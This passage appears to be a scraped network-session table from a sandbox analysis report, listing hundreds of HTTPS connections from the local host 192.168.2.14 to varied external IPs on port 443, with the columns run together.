                                      24083192.168.2.144071064.211.104.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24084192.168.2.1450446111.182.37.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24085192.168.2.144128418.157.218.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24086192.168.2.144431625.21.182.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24087192.168.2.144910485.86.12.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24088192.168.2.145467854.199.33.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24089192.168.2.143402280.176.173.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24090192.168.2.145354867.85.248.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24091192.168.2.1444398213.145.32.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24092192.168.2.1450922196.191.139.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24093192.168.2.144567435.184.158.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24094192.168.2.1443154164.202.230.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24095192.168.2.1445770203.64.5.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24096192.168.2.144154466.204.227.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24097192.168.2.1440892205.35.117.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24098192.168.2.1454886163.22.87.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24099192.168.2.146048253.240.181.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24100192.168.2.1448516162.129.172.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24101192.168.2.144358032.114.30.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24102192.168.2.1443396189.166.23.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24103192.168.2.1444632105.142.69.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24104192.168.2.1460576108.120.225.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24105192.168.2.1435328102.171.134.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24106192.168.2.1447772130.16.47.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24107192.168.2.1457190205.18.47.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24108192.168.2.1441450180.92.31.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24109192.168.2.145618038.185.114.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24110192.168.2.143845260.131.72.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24111192.168.2.1450054130.14.213.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24112192.168.2.1445056163.98.42.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24113192.168.2.1441686161.65.242.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24114192.168.2.1459986163.51.197.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24115192.168.2.1459416146.143.253.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24116192.168.2.143596087.16.148.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24117192.168.2.1437994102.115.218.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24118192.168.2.144743687.192.186.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24119192.168.2.1458870122.160.131.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24120192.168.2.1434146168.76.229.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24121192.168.2.1458346112.50.192.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24122192.168.2.144876647.31.80.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24123192.168.2.1452218107.89.37.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24124192.168.2.144180645.187.138.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24125192.168.2.145850034.249.209.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24126192.168.2.143789425.39.60.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24127192.168.2.1442514145.240.62.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24128192.168.2.144402484.224.80.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24129192.168.2.144778854.84.40.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24130192.168.2.145561095.60.10.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24131192.168.2.1435694160.248.193.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24132192.168.2.143381257.17.117.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24133192.168.2.1455970193.91.145.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24134192.168.2.1442270156.174.84.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24135192.168.2.1445972129.142.24.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24136192.168.2.1457308177.131.94.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24137192.168.2.145684258.236.109.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24138192.168.2.144567227.195.50.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24139192.168.2.143419285.207.18.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24140192.168.2.1446934187.89.68.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24141192.168.2.1443444113.229.54.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24142192.168.2.1447970196.248.38.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24143192.168.2.1432938211.30.216.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24144192.168.2.144297897.59.238.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24145192.168.2.1448300141.206.122.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24146192.168.2.1435468132.238.117.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24147192.168.2.143816088.142.199.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24148192.168.2.144274286.40.185.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24149192.168.2.1436700121.99.27.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24150192.168.2.1435212217.242.238.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24151192.168.2.1448212126.194.161.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24152192.168.2.145295259.176.127.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24153192.168.2.1447652132.110.36.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24154192.168.2.1433722100.242.48.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24155192.168.2.144650637.110.86.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24156192.168.2.1441900161.157.92.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24157192.168.2.145243468.29.191.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24158192.168.2.1447136157.120.47.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24159192.168.2.1446830179.135.139.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24160192.168.2.1439916219.48.161.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24161192.168.2.1433926201.239.193.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24162192.168.2.144462420.56.163.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24163192.168.2.144540645.125.147.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24164192.168.2.145474276.155.254.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24165192.168.2.1442542161.20.253.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24166192.168.2.144908490.158.210.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24167192.168.2.1433826128.72.202.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24168192.168.2.143337862.180.112.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24169192.168.2.1433036136.43.185.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24170192.168.2.1436328115.238.252.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24171192.168.2.1452928174.84.173.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24172192.168.2.143641289.150.47.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24173192.168.2.144949446.35.69.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24174192.168.2.1448436213.227.225.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24175192.168.2.1446492108.78.109.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24176192.168.2.1435558163.230.12.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24177192.168.2.1449556101.204.114.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24178192.168.2.1436914120.184.46.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24179192.168.2.143960245.203.235.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24180192.168.2.1443872172.35.160.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24181192.168.2.1443254181.142.243.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24182192.168.2.144620063.20.70.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24183192.168.2.1459456207.19.58.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24184192.168.2.144820435.162.188.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24185192.168.2.143546425.60.165.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24186192.168.2.1455360218.2.175.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24187192.168.2.14487184.46.237.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24188192.168.2.143891623.49.47.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24189192.168.2.1438022159.198.230.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24190192.168.2.1459008144.29.101.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24191192.168.2.145783692.76.198.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24192192.168.2.145708693.71.118.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24193192.168.2.1460952140.1.214.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24194192.168.2.144426869.103.53.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24195192.168.2.1450672137.175.122.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24196192.168.2.1441676216.150.125.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24197192.168.2.1433198217.219.68.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24198192.168.2.1445400143.125.53.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24199192.168.2.1447406184.187.141.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24200192.168.2.144716665.148.217.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24201192.168.2.1434592156.154.41.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24202192.168.2.1443994172.176.136.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24203192.168.2.1440504166.73.99.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24204192.168.2.1453846182.235.27.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24205192.168.2.144447818.94.233.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24206192.168.2.1453298151.170.147.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24207192.168.2.144687049.229.225.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24208192.168.2.1458648216.152.51.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24209192.168.2.1433850125.123.42.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24210192.168.2.1443234167.184.48.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24211192.168.2.143726876.31.174.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24212192.168.2.143580294.49.141.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24213192.168.2.1442070210.74.212.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24214192.168.2.1459152204.132.146.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24215192.168.2.1435420133.16.215.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24216192.168.2.145512887.131.96.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24217192.168.2.1442784115.255.70.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24218192.168.2.1446640148.114.203.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24219192.168.2.145800872.167.205.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24220192.168.2.1441242176.32.124.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24221192.168.2.144685040.59.70.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24222192.168.2.14489162.221.98.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24223192.168.2.1438166189.46.42.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24224192.168.2.144028097.34.237.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24225192.168.2.1451656191.121.246.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24226192.168.2.1443052217.63.40.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24227192.168.2.14577125.228.70.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24228192.168.2.1446522216.237.111.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24229192.168.2.144825060.170.145.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24230192.168.2.1448898119.234.165.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24231192.168.2.1444082135.125.149.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24232192.168.2.144071236.205.180.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24233192.168.2.143710020.127.38.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24234192.168.2.145404062.40.225.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24235192.168.2.1451012115.54.174.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24236192.168.2.1446718129.155.11.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24237192.168.2.1457436219.55.38.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24238192.168.2.1457470138.16.165.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24239192.168.2.145972879.74.224.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24240192.168.2.1452790119.66.91.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24241192.168.2.144884267.53.253.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24242192.168.2.144784245.238.157.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24243192.168.2.1457354182.53.231.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24244192.168.2.1434408213.0.14.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24245192.168.2.1443016184.73.226.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24246192.168.2.145001413.112.222.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24247192.168.2.144936882.95.54.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24248192.168.2.144508257.85.188.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24249192.168.2.1438478192.58.228.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24250192.168.2.144247889.77.125.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24251192.168.2.145111688.171.210.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24252192.168.2.144183460.84.18.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24253192.168.2.1453776165.254.164.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24254192.168.2.1437242205.62.249.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24255192.168.2.1449446168.105.103.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24256192.168.2.1454000113.0.192.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24257192.168.2.1442518182.63.250.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24258192.168.2.144483848.121.46.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24259192.168.2.1441992141.220.67.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24260192.168.2.14432365.245.147.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24261192.168.2.145521414.82.235.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24262192.168.2.1439470167.30.223.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24263192.168.2.146016048.178.197.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24264192.168.2.1450650208.248.199.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24265192.168.2.145021684.139.191.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24266192.168.2.144365823.192.46.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24267192.168.2.144765286.26.4.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24268192.168.2.1435298112.190.137.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24269192.168.2.144600014.202.126.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24270192.168.2.1457742183.69.249.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24271192.168.2.1447962139.10.193.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24272192.168.2.1460204175.205.103.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24273192.168.2.14387402.187.105.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24274192.168.2.144701696.126.66.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24275192.168.2.1456324108.28.39.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24276192.168.2.1443674107.54.214.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24277192.168.2.1437130189.106.62.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24278192.168.2.1457356153.176.112.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24279192.168.2.1432932186.162.61.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24280192.168.2.1451138133.132.54.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24281192.168.2.1446278209.199.44.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24282192.168.2.143446420.119.12.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24283192.168.2.1450594162.250.232.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24284192.168.2.1436104191.169.235.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24285192.168.2.1455530194.244.81.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24286192.168.2.1436668131.107.132.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24287192.168.2.1433520114.216.0.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24288192.168.2.1460252100.214.85.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24289192.168.2.14350145.39.148.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24290192.168.2.143422423.227.249.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24291192.168.2.143877686.106.230.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24292192.168.2.143286459.153.9.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24293192.168.2.143455683.23.180.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24294192.168.2.1436204186.32.147.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24295192.168.2.1447946164.41.59.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24296192.168.2.1459834114.223.171.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24297192.168.2.1450118146.175.175.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24298192.168.2.1435984195.194.184.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24299192.168.2.1449088104.123.66.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24300192.168.2.144914894.46.220.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24301192.168.2.1456406185.43.103.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24302192.168.2.1438408149.162.227.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24303192.168.2.1455270114.25.210.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24304192.168.2.1456562102.87.153.122443
                                      TimestampBytes transferredDirectionData


